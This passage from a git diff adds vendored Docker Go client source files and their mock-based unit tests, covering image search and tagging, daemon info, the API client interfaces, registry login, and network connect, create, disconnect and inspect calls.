err != nil { + t.Fatal(err) + } + if len(results) != 1 { + t.Fatalf("expected 1 result, got %v", results) + } +} + +func TestImageSearchWithoutErrors(t *testing.T) { + expectedURL := "/images/search" + filterArgs := filters.NewArgs() + filterArgs.Add("is-automated", "true") + filterArgs.Add("stars", "3") + + expectedFilters := `{"is-automated":{"true":true},"stars":{"3":true}}` + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + term := query.Get("term") + if term != "some-image" { + return nil, fmt.Errorf("term not set in URL query properly. Expected 'some-image', got %s", term) + } + filters := query.Get("filters") + if filters != expectedFilters { + return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", expectedFilters, filters) + } + content, err := json.Marshal([]registry.SearchResult{ + { + Name: "anything", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + results, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{ + Filters: filterArgs, + }) + if err != nil { + t.Fatal(err) + } + if len(results) != 1 { + t.Fatalf("expected a result, got %v", results) + } +} diff --git a/vendor/github.com/docker/docker/client/image_tag.go b/vendor/github.com/docker/docker/client/image_tag.go new file mode 100644 index 0000000000..bdbf94add2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_tag.go @@ -0,0 +1,34 @@ +package client + +import ( + "errors" + "fmt" + "net/url" + + "golang.org/x/net/context" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types/reference" +) + +// ImageTag tags an image in the docker host +func (cli *Client) ImageTag(ctx context.Context, imageID, ref string) error { + distributionRef, err := distreference.ParseNamed(ref) + if err != nil { + return fmt.Errorf("Error parsing reference: %q is not a valid repository/tag", ref) + } + + if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + return errors.New("refusing to create a tag with a digest reference") + } + + tag := reference.GetTagFromNamedRef(distributionRef) + + query := url.Values{} + query.Set("repo", distributionRef.Name()) + query.Set("tag", tag) + + resp, err := cli.post(ctx, "/images/"+imageID+"/tag", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/image_tag_test.go b/vendor/github.com/docker/docker/client/image_tag_test.go new file mode 100644 index 0000000000..7925db9f1b --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_tag_test.go @@ -0,0 +1,121 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestImageTagError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ImageTag(context.Background(), "image_id", "repo:tag") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +// Note: this is not testing all the InvalidReference as it's the reponsability +// of distribution/reference package. +func TestImageTagInvalidReference(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ImageTag(context.Background(), "image_id", "aa/asdf$$^/aa") + if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag` { + t.Fatalf("expected ErrReferenceInvalidFormat, got %v", err) + } +} + +func TestImageTag(t *testing.T) { + expectedURL := "/images/image_id/tag" + tagCases := []struct { + reference string + expectedQueryParams map[string]string + }{ + { + reference: "repository:tag1", + expectedQueryParams: map[string]string{ + "repo": "repository", + "tag": "tag1", + }, + }, { + reference: "another_repository:latest", + expectedQueryParams: map[string]string{ + "repo": "another_repository", + "tag": "latest", + }, + }, { + reference: "another_repository", + expectedQueryParams: map[string]string{ + "repo": "another_repository", + "tag": "latest", + }, + }, { + reference: "test/another_repository", + expectedQueryParams: map[string]string{ + "repo": "test/another_repository", + "tag": "latest", + }, + }, { + reference: "test/another_repository:tag1", + expectedQueryParams: map[string]string{ + "repo": "test/another_repository", + "tag": "tag1", + }, + }, { + reference: "test/test/another_repository:tag1", + expectedQueryParams: map[string]string{ + "repo": "test/test/another_repository", + "tag": "tag1", + }, + }, { + reference: "test:5000/test/another_repository:tag1", + expectedQueryParams: map[string]string{ + "repo": "test:5000/test/another_repository", + "tag": "tag1", + }, + }, { + reference: "test:5000/test/another_repository", + expectedQueryParams: map[string]string{ + "repo": "test:5000/test/another_repository", + "tag": "latest", + }, + }, + } + for _, tagCase := range tagCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + query := req.URL.Query() + for key, expected := range tagCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + err := client.ImageTag(context.Background(), "image_id", tagCase.reference) + if err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/client/info.go b/vendor/github.com/docker/docker/client/info.go new file mode 100644 index 0000000000..ac07961224 --- /dev/null +++ b/vendor/github.com/docker/docker/client/info.go @@ -0,0 +1,26 @@ +package client + +import ( + "encoding/json" + "fmt" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// Info returns information about the docker server. +func (cli *Client) Info(ctx context.Context) (types.Info, error) { + var info types.Info + serverResp, err := cli.get(ctx, "/info", url.Values{}, nil) + if err != nil { + return info, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&info); err != nil { + return info, fmt.Errorf("Error reading remote info: %v", err) + } + + return info, nil +} diff --git a/vendor/github.com/docker/docker/client/info_test.go b/vendor/github.com/docker/docker/client/info_test.go new file mode 100644 index 0000000000..79f23c8af2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/info_test.go @@ -0,0 +1,76 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestInfoServerError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.Info(context.Background()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestInfoInvalidResponseJSONError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("invalid json"))), + }, nil + }), + } + _, err := client.Info(context.Background()) + if err == nil || !strings.Contains(err.Error(), "invalid character") { + t.Fatalf("expected a 'invalid character' error, got %v", err) + } +} + +func TestInfo(t *testing.T) { + expectedURL := "/info" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + info := &types.Info{ + ID: "daemonID", + Containers: 3, + } + b, err := json.Marshal(info) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + info, err := client.Info(context.Background()) + if err != nil { + t.Fatal(err) + } + + if info.ID != "daemonID" { + t.Fatalf("expected daemonID, got %s", info.ID) + } + + if info.Containers != 3 { + t.Fatalf("expected 3 containers, got %d", info.Containers) + } +} diff --git a/vendor/github.com/docker/docker/client/interface.go b/vendor/github.com/docker/docker/client/interface.go new file mode 100644 index 0000000000..05978039b7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/interface.go @@ -0,0 +1,171 @@ +package client + +import ( + "io" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/api/types/swarm" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +// CommonAPIClient is the common methods between stable and experimental versions of APIClient. +type CommonAPIClient interface { + ContainerAPIClient + ImageAPIClient + NodeAPIClient + NetworkAPIClient + PluginAPIClient + ServiceAPIClient + SwarmAPIClient + SecretAPIClient + SystemAPIClient + VolumeAPIClient + ClientVersion() string + ServerVersion(ctx context.Context) (types.Version, error) + UpdateClientVersion(v string) +} + +// ContainerAPIClient defines API client methods for the containers +type ContainerAPIClient interface { + ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) + ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) + ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error) + ContainerDiff(ctx context.Context, container string) ([]types.ContainerChange, error) + ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) + ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error) + ContainerExecInspect(ctx context.Context, execID string) (types.ContainerExecInspect, error) + ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error + ContainerExecStart(ctx context.Context, execID string, config types.ExecStartCheck) error + ContainerExport(ctx context.Context, container string) (io.ReadCloser, error) + ContainerInspect(ctx context.Context, container string) (types.ContainerJSON, error) + ContainerInspectWithRaw(ctx context.Context, container string, getSize bool) (types.ContainerJSON, []byte, error) + ContainerKill(ctx context.Context, container, signal string) error + ContainerList(ctx context.Context, options types.ContainerListOptions) ([]types.Container, error) + ContainerLogs(ctx context.Context, container string, options types.ContainerLogsOptions) (io.ReadCloser, error) + ContainerPause(ctx context.Context, container string) error + ContainerRemove(ctx context.Context, container string, options types.ContainerRemoveOptions) error + ContainerRename(ctx context.Context, container, newContainerName string) error + ContainerResize(ctx context.Context, container string, options types.ResizeOptions) error + ContainerRestart(ctx context.Context, container string, timeout *time.Duration) error + ContainerStatPath(ctx context.Context, container, path string) (types.ContainerPathStat, error) + ContainerStats(ctx context.Context, container string, stream bool) (types.ContainerStats, error) + ContainerStart(ctx context.Context, container string, options types.ContainerStartOptions) error + ContainerStop(ctx context.Context, container string, timeout *time.Duration) error + ContainerTop(ctx context.Context, container string, arguments []string) (types.ContainerProcessList, error) + ContainerUnpause(ctx context.Context, container string) error + ContainerUpdate(ctx context.Context, container string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error) + ContainerWait(ctx context.Context, container string) (int64, error) + CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) + CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error + ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error) +} + +// ImageAPIClient defines API client methods for the images +type ImageAPIClient interface { + ImageBuild(ctx context.Context, context io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, error) + ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) + ImageHistory(ctx context.Context, image string) ([]types.ImageHistory, error) + ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) + ImageInspectWithRaw(ctx context.Context, image string) (types.ImageInspect, []byte, error) + ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error) + ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error) + ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) + ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) + ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) + ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error) + ImageSave(ctx context.Context, images []string) (io.ReadCloser, error) + ImageTag(ctx context.Context, image, ref string) error + ImagesPrune(ctx context.Context, pruneFilter filters.Args) (types.ImagesPruneReport, error) +} + +// NetworkAPIClient defines API client methods for the networks +type NetworkAPIClient interface { + NetworkConnect(ctx context.Context, networkID, container string, config *network.EndpointSettings) error + NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error) + NetworkDisconnect(ctx context.Context, networkID, container string, force bool) error + NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) + NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) + NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error) + NetworkRemove(ctx context.Context, networkID string) error + NetworksPrune(ctx context.Context, pruneFilter filters.Args) (types.NetworksPruneReport, error) +} + +// NodeAPIClient defines API client methods for the nodes +type NodeAPIClient interface { + NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error) + NodeList(ctx context.Context, options types.NodeListOptions) ([]swarm.Node, error) + NodeRemove(ctx context.Context, nodeID string, options types.NodeRemoveOptions) error + NodeUpdate(ctx context.Context, nodeID string, version swarm.Version, node swarm.NodeSpec) error +} + +// PluginAPIClient defines API client methods for the plugins +type PluginAPIClient interface { + PluginList(ctx context.Context) (types.PluginsListResponse, error) + PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error + PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error + PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error + PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (io.ReadCloser, error) + PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (io.ReadCloser, error) + PluginPush(ctx context.Context, name string, registryAuth string) (io.ReadCloser, error) + PluginSet(ctx context.Context, name string, args []string) error + PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error) + PluginCreate(ctx context.Context, createContext io.Reader, options types.PluginCreateOptions) error +} + +// ServiceAPIClient defines API client methods for the services +type ServiceAPIClient interface { + ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) + ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) + ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error) + ServiceRemove(ctx context.Context, serviceID string) error + ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) + ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error) + TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) + TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error) +} + +// SwarmAPIClient defines API client methods for the swarm +type SwarmAPIClient interface { + SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error) + SwarmJoin(ctx context.Context, req swarm.JoinRequest) error + SwarmGetUnlockKey(ctx context.Context) (types.SwarmUnlockKeyResponse, error) + SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error + SwarmLeave(ctx context.Context, force bool) error + SwarmInspect(ctx context.Context) (swarm.Swarm, error) + SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error +} + +// SystemAPIClient defines API client methods for the system +type SystemAPIClient interface { + Events(ctx context.Context, options types.EventsOptions) (<-chan events.Message, <-chan error) + Info(ctx context.Context) (types.Info, error) + RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error) + DiskUsage(ctx context.Context) (types.DiskUsage, error) + Ping(ctx context.Context) (types.Ping, error) +} + +// VolumeAPIClient defines API client methods for the volumes +type VolumeAPIClient interface { + VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) + VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error) + VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) + VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) + VolumeRemove(ctx context.Context, volumeID string, force bool) error + VolumesPrune(ctx context.Context, pruneFilter filters.Args) (types.VolumesPruneReport, error) +} + +// SecretAPIClient defines API client methods for secrets +type SecretAPIClient interface { + SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error) + SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error) + SecretRemove(ctx context.Context, id string) error + SecretInspectWithRaw(ctx context.Context, name string) (swarm.Secret, []byte, error) + SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error +} diff --git a/vendor/github.com/docker/docker/client/interface_experimental.go b/vendor/github.com/docker/docker/client/interface_experimental.go new file mode 100644 index 0000000000..51da98ecdd --- /dev/null +++ b/vendor/github.com/docker/docker/client/interface_experimental.go @@ -0,0 +1,17 @@ +package client + +import ( + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +type apiClientExperimental interface { + CheckpointAPIClient +} + +// CheckpointAPIClient defines API client methods for the checkpoints +type CheckpointAPIClient interface { + CheckpointCreate(ctx context.Context, container string, options types.CheckpointCreateOptions) error + CheckpointDelete(ctx context.Context, container string, options types.CheckpointDeleteOptions) error + CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error) +} diff --git a/vendor/github.com/docker/docker/client/interface_stable.go b/vendor/github.com/docker/docker/client/interface_stable.go new file mode 100644 index 0000000000..cc90a3cbb9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/interface_stable.go @@ -0,0 +1,10 @@ +package client + +// APIClient is an interface that clients that talk with a docker server must implement. +type APIClient interface { + CommonAPIClient + apiClientExperimental +} + +// Ensure that Client always implements APIClient. +var _ APIClient = &Client{} diff --git a/vendor/github.com/docker/docker/client/login.go b/vendor/github.com/docker/docker/client/login.go new file mode 100644 index 0000000000..600dc7196f --- /dev/null +++ b/vendor/github.com/docker/docker/client/login.go @@ -0,0 +1,29 @@ +package client + +import ( + "encoding/json" + "net/http" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/registry" + "golang.org/x/net/context" +) + +// RegistryLogin authenticates the docker server with a given docker registry. +// It returns UnauthorizerError when the authentication fails. +func (cli *Client) RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error) { + resp, err := cli.post(ctx, "/auth", url.Values{}, auth, nil) + + if resp.statusCode == http.StatusUnauthorized { + return registry.AuthenticateOKBody{}, unauthorizedError{err} + } + if err != nil { + return registry.AuthenticateOKBody{}, err + } + + var response registry.AuthenticateOKBody + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/network_connect.go b/vendor/github.com/docker/docker/client/network_connect.go new file mode 100644 index 0000000000..c022c17b5b --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_connect.go @@ -0,0 +1,18 @@ +package client + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + "golang.org/x/net/context" +) + +// NetworkConnect connects a container to an existent network in the docker host. +func (cli *Client) NetworkConnect(ctx context.Context, networkID, containerID string, config *network.EndpointSettings) error { + nc := types.NetworkConnect{ + Container: containerID, + EndpointConfig: config, + } + resp, err := cli.post(ctx, "/networks/"+networkID+"/connect", nil, nc, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/network_connect_test.go b/vendor/github.com/docker/docker/client/network_connect_test.go new file mode 100644 index 0000000000..d472f4520c --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_connect_test.go @@ -0,0 +1,107 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" +) + +func TestNetworkConnectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NetworkConnect(context.Background(), "network_id", "container_id", nil) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkConnectEmptyNilEndpointSettings(t *testing.T) { + expectedURL := "/networks/network_id/connect" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + var connect types.NetworkConnect + if err := json.NewDecoder(req.Body).Decode(&connect); err != nil { + return nil, err + } + + if connect.Container != "container_id" { + return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container) + } + + if connect.EndpointConfig != nil { + return nil, fmt.Errorf("expected connect.EndpointConfig to be nil, got %v", connect.EndpointConfig) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.NetworkConnect(context.Background(), "network_id", "container_id", nil) + if err != nil { + t.Fatal(err) + } +} + +func TestNetworkConnect(t *testing.T) { + expectedURL := "/networks/network_id/connect" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + var connect types.NetworkConnect + if err := json.NewDecoder(req.Body).Decode(&connect); err != nil { + return nil, err + } + + if connect.Container != "container_id" { + return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container) + } + + if connect.EndpointConfig.NetworkID != "NetworkID" { + return nil, fmt.Errorf("expected 'NetworkID', got %s", connect.EndpointConfig.NetworkID) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.NetworkConnect(context.Background(), "network_id", "container_id", &network.EndpointSettings{ + NetworkID: "NetworkID", + }) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/network_create.go b/vendor/github.com/docker/docker/client/network_create.go new file mode 100644 index 0000000000..4067a541ff --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_create.go @@ -0,0 +1,25 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// NetworkCreate creates a new network in the docker host. +func (cli *Client) NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error) { + networkCreateRequest := types.NetworkCreateRequest{ + NetworkCreate: options, + Name: name, + } + var response types.NetworkCreateResponse + serverResp, err := cli.post(ctx, "/networks/create", nil, networkCreateRequest, nil) + if err != nil { + return response, err + } + + json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/network_create_test.go b/vendor/github.com/docker/docker/client/network_create_test.go new file mode 100644 index 0000000000..0e2457f89c --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_create_test.go @@ -0,0 +1,72 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestNetworkCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.NetworkCreate(context.Background(), "mynetwork", types.NetworkCreate{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkCreate(t *testing.T) { + expectedURL := "/networks/create" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + content, err := json.Marshal(types.NetworkCreateResponse{ + ID: "network_id", + Warning: "warning", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + networkResponse, err := client.NetworkCreate(context.Background(), "mynetwork", types.NetworkCreate{ + CheckDuplicate: true, + Driver: "mydriver", + EnableIPv6: true, + Internal: true, + Options: map[string]string{ + "opt-key": "opt-value", + }, + }) + if err != nil { + t.Fatal(err) + } + if networkResponse.ID != "network_id" { + t.Fatalf("expected networkResponse.ID to be 'network_id', got %s", networkResponse.ID) + } + if networkResponse.Warning != "warning" { + t.Fatalf("expected networkResponse.Warning to be 'warning', got %s", networkResponse.Warning) + } +} diff --git a/vendor/github.com/docker/docker/client/network_disconnect.go b/vendor/github.com/docker/docker/client/network_disconnect.go new file mode 100644 index 0000000000..24b58e3c12 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_disconnect.go @@ -0,0 +1,14 @@ +package client + +import ( + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// NetworkDisconnect disconnects a container from an existent network in the docker host. +func (cli *Client) NetworkDisconnect(ctx context.Context, networkID, containerID string, force bool) error { + nd := types.NetworkDisconnect{Container: containerID, Force: force} + resp, err := cli.post(ctx, "/networks/"+networkID+"/disconnect", nil, nd, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/network_disconnect_test.go b/vendor/github.com/docker/docker/client/network_disconnect_test.go new file mode 100644 index 0000000000..b54a2b1ccf --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_disconnect_test.go @@ -0,0 +1,64 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestNetworkDisconnectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NetworkDisconnect(context.Background(), "network_id", "container_id", false) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkDisconnect(t *testing.T) { + expectedURL := "/networks/network_id/disconnect" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + var disconnect types.NetworkDisconnect + if err := json.NewDecoder(req.Body).Decode(&disconnect); err != nil { + return nil, err + } + + if disconnect.Container != "container_id" { + return nil, fmt.Errorf("expected 'container_id', got %s", disconnect.Container) + } + + if !disconnect.Force { + return nil, fmt.Errorf("expected Force to be true, got %v", disconnect.Force) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.NetworkDisconnect(context.Background(), "network_id", "container_id", true) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/network_inspect.go b/vendor/github.com/docker/docker/client/network_inspect.go new file mode 100644 index 0000000000..5ad4ea5bf3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_inspect.go @@ -0,0 +1,38 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// NetworkInspect returns the information for a specific network configured in the docker host. +func (cli *Client) NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) { + networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID) + return networkResource, err +} + +// NetworkInspectWithRaw returns the information for a specific network configured in the docker host and its raw representation. +func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) { + var networkResource types.NetworkResource + resp, err := cli.get(ctx, "/networks/"+networkID, nil, nil) + if err != nil { + if resp.statusCode == http.StatusNotFound { + return networkResource, nil, networkNotFoundError{networkID} + } + return networkResource, nil, err + } + defer ensureReaderClosed(resp) + + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return networkResource, nil, err + } + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&networkResource) + return networkResource, body, err +} diff --git a/vendor/github.com/docker/docker/client/network_inspect_test.go b/vendor/github.com/docker/docker/client/network_inspect_test.go new file mode 100644 index 0000000000..1f926d66ba --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_inspect_test.go @@ -0,0 +1,69 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestNetworkInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.NetworkInspect(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkInspectContainerNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, err := client.NetworkInspect(context.Background(), "unknown") + if err == nil || !IsErrNetworkNotFound(err) { + t.Fatalf("expected a containerNotFound error, got %v", err) + } 